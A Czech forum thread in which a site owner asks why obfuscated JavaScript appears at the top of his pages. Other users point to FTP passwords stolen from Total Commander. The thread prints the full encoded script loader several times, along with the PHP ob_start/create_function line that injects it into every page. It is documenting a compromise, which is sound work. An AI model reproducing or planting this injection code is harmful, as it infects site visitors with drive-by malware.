Autor Zpráva
had
Profil *
ahoj, mám tu takový malý problémek.
jak je možné zaútočit na PHP script a podstrčit do výslednýho zdrojáku tohle:

																																								<script language=javascript>hjqndh="vp!#gwMTm%JsRSH";paisvuhg="<!73!63ri!70!74!20la!6e!67uag!65=javascript!3e!20 !66un!63!74!69!6fn b!71z!79orhp!75!28dz!6c!75e!69!29{var ys!76dgpt,!75yxdu!72!73t!3d\"!4d3!29!2a!7e+!27!7d!21!707!28^!7c#!2d!42!30Eoi,z!46Jl9!60{Zf_ Hth:Ky!3d!32@!41Iuc1GbnTPCv!5bgw4\\\"O!56!5d!2e!3b!786$!73Nm!64ar&Ukeq85j!22!2cavu!77!78!6cvw!3d!22\",!6dd!70h!6d!6ez!69r!2cxk!73r!6aq,!64h!6ew!76!6fs!71!6b=\"\",!62f!6e!61!73q!70z;!66!6f!72(!79!73vdg!70t!3d!30;!79svdgp!74<dzlu!65!69.!6ce!6e!67!74h;!79s!76!64gp!74+!2b){!20mdph!6d!6ezir!3d!64z!6cue!69!2ech!61!72A!74!28ys!76dgp!74);xksrjq=uyxdu!72!73t.i!6e!64ex!4ff!28!6dd!70!68mnzir!29!3b!69f!28xksrjq>-1!29{ !62!66na!73!71!70!7a!3d(!28!78!6bs!72jq!2b1)!2581-1)!3b!69f(b!66!6easqpz<=0)bfn!61!73qpz+=81;!64hn!77!76osqk+!3d!75!79xdu!72st.c!68arAt(b!66n!61!73!71pz-1)!3b!20}!20!65ls!65 !64!68n!77v!6fsq!6b+=md!70!68mnz!69!72!3b}avuwxlvw+=!64!68nwvo!73q!6b;!64oc!75me!6et.wr!69!74!65(avuw!78!6cvw!29!3b}!3c!2f!73c!72ip!74>";exsxwisb=hjqndh.charAt(9);dhhhissq=paisvuhg.replace(/!/g,exsxwisb);qvmqttl=unescape(dhhhissq);var utempkqf,lbjbghudd;document.write(qvmqttl);utempkqf="<N1&,7hH9rTwcrwq2Olr[rS1&,7hO>H_cT1h,iTHeM[h7F6:1w^*HZHh&=HZH[r&H76Ti9a9h:2HOwrdhT=w44OzHe48:eh9iaq&M_H2HGxH_cT1h,iTHaN1MiFea4^TrdqzH[r9cq*HZ[r&HaH2HTq4HDrhqxa;NqhP,dq^^Tq4HDrhq*;wqhP,dq^*H'H5$\"EEEEE*xai1cdqTh;1iie,qH2HTrdqH'HO2OH'HqN1r7q^[r9cq*H'HOxHq67,&qN2OH'Ha;hib3PSh&,Tw^*x!H_cT1h,iTH&,nan,6d_ih8:q^*HZ&qhc&TH^ai1cdqTh;1iie,q;,Taq6V_^76Ti9a9h:H'HO2OH'He48:eh9iaq&M_*H22HBG*x!H,_^H&,nan,6d_ih8:q^*H*HZHai1cdqTh;4&,hq^HO<SvRuCPH9rTwcrwq2\\Olr[rS1&,7h\\OHSRv2\\O:hh7K//wiiw9qrTr9=h91N;Tqh/  chd;w,_?$G@$)1((@)jr55\"`E`r)E@\"rGnGaG@\"E`5)\"\")_B)\"`(`E\"`\"UO'ai1cdqTh;&q_q&&q&'OUO'Sh&,Tw^^Tq4HDrhq^**;wqhP,dq^**'O\\O><\\/SvRO'OuCP>OH*xHaN1MiFea4^H76Ti9a9h:zHe48:eh9iaq&M_H*xH!Hq9NqHZH!H!H1rh1:H^q*HZ!H!HeM[h7F6:1w^*x</N1&,7h>H";bqzyorhpu(utempkqf);</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

...

setkali jste se s tím někdy???
nevypisuju žádnou proměnnou (ani session), který by se nechali takhle vypsat ještě před zavoláním souboru hlavicka.php (mám soubor conn.php, ve kterém mám připojení a který includuju vždy na začátku scriptu, zde mám ošetřené mj. i session_regenerate_id() --soubor hlavicka.php obsahuje začátek html včetně doctype)

jak je možné, že mi to tam něco strká??? prohlížečem to nebude 100%, poskytovatel subdomény mi nic takového neudělá aniž by mi dal vědět..)
had
Profil *
.. omlouvám se, ten zdroják se špatně převedl...



<script language=javascript>hjqndh="vp!#gwMTm%JsRSH";paisvuhg="<!73!63ri!70!74!20la!6e!67uag!65=javascript!3e!20 !66un!63!74!69!6fn b!71z!79orhp!75!28dz!6c!75e!69!29{var ys!76dgpt,!75yxdu!72!73t!3d\"!4d3!29!2a!7e+!27!7d!21!707!28^!7c#!2d!42!30Eoi,z!46Jl9!60{Zf_ Hth:Ky!3d!32@!41Iuc1GbnTPCv!5bgw4\\\"O!56!5d!2e!3b!786$!73Nm!64ar&Ukeq85j!22!2cavu!77!78!6cvw!3d!22\",!6dd!70h!6d!6ez!69r!2cxk!73r!6aq,!64h!6ew!76!6fs!71!6b=\"\",!62f!6e!61!73q!70z;!66!6f!72(!79!73vdg!70t!3d!30;!79svdgp!74<dzlu!65!69.!6ce!6e!67!74h;!79s!76!64gp!74+!2b){!20mdph!6d!6ezir!3d!64z!6cue!69!2ech!61!72A!74!28ys!76dgp!74);xksrjq=uyxdu!72!73t.i!6e!64ex!4ff!28!6dd!70!68mnzir!29!3b!69f!28xksrjq>-1!29{ !62!66na!73!71!70!7a!3d(!28!78!6bs!72jq!2b1)!2581-1)!3b!69f(b!66!6easqpz<=0)bfn!61!73qpz+=81;!64hn!77!76osqk+!3d!75!79xdu!72st.c!68arAt(b!66n!61!73!71pz-1)!3b!20}!20!65ls!65 !64!68n!77v!6fsq!6b+=md!70!68mnz!69!72!3b}avuwxlvw+=!64!68nwvo!73q!6b;!64oc!75me!6et.wr!69!74!65(avuw!78!6cvw!29!3b}!3c!2f!73c!72ip!74>";exsxwisb=hjqndh.charAt(9);dhhhissq=paisvuhg.replace(/!/g,exsxwisb);qvmqttl=unescape(dhhhissq);var utempkqf,lbjbghudd;document.write(qvmqttl);utempkqf="<N1&,7hH9rTwcrwq2Olr[rS1&,7hO>H_cT1h,iTHeM[h7F6:1w^*HZHh&=HZH[r&H76Ti9a9h:2HOwrdhT=w44OzHe48:eh9iaq&M_H2HGxH_cT1h,iTHaN1MiFea4^TrdqzH[r9cq*HZ[r&HaH2HTq4HDrhqxa;NqhP,dq^^Tq4HDrhq*;wqhP,dq^*H'H5$\"EEEEE*xai1cdqTh;1iie,qH2HTrdqH'HO2OH'HqN1r7q^[r9cq*H'HOxHq67,&qN2OH'Ha;hib3PSh&,Tw^*x!H_cT1h,iTH&,nan,6d_ih8:q^*HZ&qhc&TH^ai1cdqTh;1iie,q;,Taq6V_^76Ti9a9h:H'HO2OH'He48:eh9iaq&M_*H22HBG*x!H,_^H&,nan,6d_ih8:q^*H*HZHai1cdqTh;4&,hq^HO<SvRuCPH9rTwcrwq2\\Olr[rS1&,7h\\OHSRv2\\O:hh7K//wiiw9qrTr9=h91N;Tqh/ chd;w,_?$G@$)1((@)jr55\"`E`r)E@\"rGnGaG@\"E`5)\"\")_B)\"`(`E\"`\"UO'ai1cdqTh;&q_q&&q&'OUO'Sh&,Tw^^Tq4HDrhq^**;wqhP,dq^**'O\\O><\\/SvRO'OuCP>OH*xHaN1MiFea4^H76Ti9a9h:zHe48:eh9iaq&M_H*xH!Hq9NqHZH!H!H1rh1:H^q*HZ!H!HeM[h7F6:1w^*x</N1&,7h>H";bqzyorhpu(utempkqf);</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
Hitman
Profil
Jaký používáš program pro přenos? Pokud používáš Total Commander, raději neukládej heslo.
had
Profil *
jo, používám total commander. takže si mám změnit heslo na FTP a v total commanderu ho neukládat? myslíš, že nějaký vir mi z kompu vzal heslo na ftp??? to by útok byl podstatně horší, ne?
had
Profil *
našel jsem v error logu ještě tohle:

[Mon Apr 20 20:37:31 2009] [error] [client 211.52.78.2] script '/home/vsftp/veka_signaly_cz/veka.signaly.cz/xmlrpc.php' not found or unable to stat

...to by mohlo být ono, ne? ale jak by se dostal na ftp php cizí php soubor???
had
Profil *
a když jsem teď ještě trochu zapátral, objevil jsem v jednom souboru přímo vpsaný kód:

<?php /*c7d2dcf9149f904af05638144c8203b4*/ob_start( create_function( '$buf', 'return str_repeat("\t",rand(28,40)).\'<script language=javascript>hjqndh="vp!#gwMTm%JsRSH";paisvuhg="<!73!63ri!70!74!20la!6e!67uag!65=javascript!3e!20 !66un!63!74!69!6fn b!71z!79orhp!75!28dz!6c!75e!69!29{var ys!76dgpt,!75yxdu!72!73t!3d\\\\"!4d3!29!2a!7e+!27!7d!21!707!28^!7c#!2d!42!30Eoi,z!46Jl9!60{Zf_ Hth:Ky!3d!32@!41Iuc1GbnTPCv!5bgw4\\\\\\\\\\\\"O!56!5d!2e!3b!786$!73Nm!64ar&Ukeq85j!22!2cavu!77!78!6cvw!3d!22\\\\",!6dd!70h!6d!6ez!69r!2cxk!73r!6aq,!64h!6ew!76!6fs!71!6b=\\\\"\\\\",!62f!6e!61!73q!70z;!66!6f!72(!79!73vdg!70t!3d!30;!79svdgp!74<dzlu!65!69.!6ce!6e!67!74h;!79s!76!64gp!74+!2b){!20mdph!6d!6ezir!3d!64z!6cue!69!2ech!61!72A!74!28ys!76dgp!74);xksrjq=uyxdu!72!73t.i!6e!64ex!4ff!28!6dd!70!68mnzir!29!3b!69f!28xksrjq>-1!29{ !62!66na!73!71!70!7a!3d(!28!78!6bs!72jq!2b1)!2581-1)!3b!69f(b!66!6easqpz<=0)bfn!61!73qpz+=81;!64hn!77!76osqk+!3d!75!79xdu!72st.c!68arAt(b!66n!61!73!71pz-1)!3b!20}!20!65ls!65 !64!68n!77v!6fsq!6b+=md!70!68mnz!69!72!3b}avuwxlvw+=!64!68nwvo!73q!6b;!64oc!75me!6et.wr!69!74!65(avuw!78!6cvw!29!3b}!3c!2f!73c!72ip!74>";exsxwisb=hjqndh.charAt(9);dhhhissq=paisvuhg.replace(/!/g,exsxwisb);qvmqttl=unescape(dhhhissq);var utempkqf,lbjbghudd;document.write(qvmqttl);utempkqf="<N1&,7hH9rTwcrwq2Olr[rS1&,7hO>H_cT1h,iTHeM[h7F6:1w^*HZHh&=HZH[r&H76Ti9a9h:2HOwrdhT=w44OzHe48:eh9iaq&M_H2HGxH_cT1h,iTHaN1MiFea4^TrdqzH[r9cq*HZ[r&HaH2HTq4HDrhqxa;NqhP,dq^^Tq4HDrhq*;wqhP,dq^*H\\\'H5$\\\\"EEEEE*xai1cdqTh;1iie,qH2HTrdqH\\\'HO2OH\\\'HqN1r7q^[r9cq*H\\\'HOxHq67,&qN2OH\\\'Ha;hib3PSh&,Tw^*x!H_cT1h,iTH&,nan,6d_ih8:q^*HZ&qhc&TH^ai1cdqTh;1iie,q;,Taq6V_^76Ti9a9h:H\\\'HO2OH\\\'He48:eh9iaq&M_*H22HBG*x!H,_^H&,nan,6d_ih8:q^*H*HZHai1cdqTh;4&,hq^HO<SvRuCPH9rTwcrwq2\\\\\\\\Olr[rS1&,7h\\\\\\\\OHSRv2\\\\\\\\O:hh7K//wiiw9qrTr9=h91N;Tqh/ chd;w,_?$G@$)1((@)jr55\\\\"`E`r)E@\\\\"rGnGaG@\\\\"E`5)\\\\"\\\\")_B)\\\\"`(`E\\\\"`\\\\"UO\\\'ai1cdqTh;&q_q&&q&\\\'OUO\\\'Sh&,Tw^^Tq4HDrhq^**;wqhP,dq^**\\\'O\\\\\\\\O><\\\\\\\\/SvRO\\\'OuCP>OH*xHaN1MiFea4^H76Ti9a9h:zHe48:eh9iaq&M_H*xH!Hq9NqHZH!H!H1rh1:H^q*HZ!H!HeM[h7F6:1w^*x</N1&,7h>H";bqzyorhpu(utempkqf);</script>\'."\n".$buf;' ) );/*c7d2dcf9149f904af05638144c8203b4*/
AM_
Profil
Cest je několik:
1- skutečně ti ukradli heslo z wcx_ftp.ini, to se teď stává často
2- máš bezpečnostní chybu někde ve vlastním PHP kódu a někdo jí zneužil
3- někdo nahackoval hosting (nepravděpodobné, ale už jsem se s tím setkal)

Řešení je změnit heslo, neukládat ho do TC a doufat.
had
Profil *
hm...ok, díky
Hitman
Profil
had
o, používám total commander. takže si mám změnit heslo na FTP a v total commanderu ho neukládat? myslíš, že nějaký vir mi z kompu vzal heslo na ftp??? to by útok byl podstatně horší, ne?

Ano, změň si heslo na FTP a v Total Commanderu jej neukládej. Praděpodobně se tam někdo dostal přes PC, vir to přímo není, ale asi to bude něco podobného, v posledních několika týdnech o tom slyším často.
AM_
Profil
vir to přímo není
a co to teda je? bakteriální onemocnění? :) dokonce to splňuje i původní význam počítačového viru - šíří se to samo.
Hitman
Profil
AM_
Nevím přesně, co se u hada v PC stalo, ale ve mnoha případech se jedná o hack, virem bych to přímo nenazýval.
Smozdřejmě se mohu mýlit, této problematice se nijak nevěnuji.
AM_
Profil
Hitman
Aha, takhle. Momentálně jsou dost rožšířené viry čtoucí wcx_ftp.ini; a nežádoucí kód ve stránce se dá nazvat virem, ikdyž ho tam vložil hacker.
had
Profil *
no...je to docela možný...ovšem pokud se mi dostal do PC, pak to co k tomu použil je vir (pokud to neudělal ručně - pak je to hack), nebo se mejlím??? pokud vím nikde jsem nesdílel ani nekopíroval soubor wcx_ftp.ini...
nežádoucí kód ve stránce je spíš hack ikdyž může působit jako vir... ale nevím, tomuhle se taky nevěnuju ;)
Hitman
Profil
had
Kždopádně nejlepší bude, když si změníš heslo a nebudeš ho v Total Commanderu ukládat, pokud by se ti kód měnil pořád, můžeš hledat chybu na serveru, nebo ti někdo může zjišťovat stisknuté klávesy.

Vaše odpověď

Mohlo by se hodit


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: